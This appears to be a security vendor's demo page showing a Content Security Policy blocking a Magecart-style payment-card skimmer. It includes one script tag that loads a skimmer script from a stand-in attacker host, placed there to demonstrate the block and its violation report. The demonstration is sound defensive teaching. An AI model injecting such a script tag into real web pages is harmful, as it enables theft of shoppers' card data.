With CSP Demo #2
See a web-skimmer running and stealing data
View Source On This Page
We've been hit by a Magecart attack, but hackers can't steal any data!
Magecart are a hacking collective that specialise in stealing Payment Card Data from E-Commerce websites. This page has been infected with a Magecart skimmer but because this page has a Content Security Policy, your data is safe and cannot be stolen by the attackers!
<script src="https://evil-cyber-hacker.com/magecart.js"></script>
After inserting your (fake!) credit card data into the field above, check the Console to see what action the browser took to neutralise the keylogger. You can also check the Network tab in Dev Tools to see that this attack has been reported to the site operator by looking for a POST request to https://demo.report-uri.com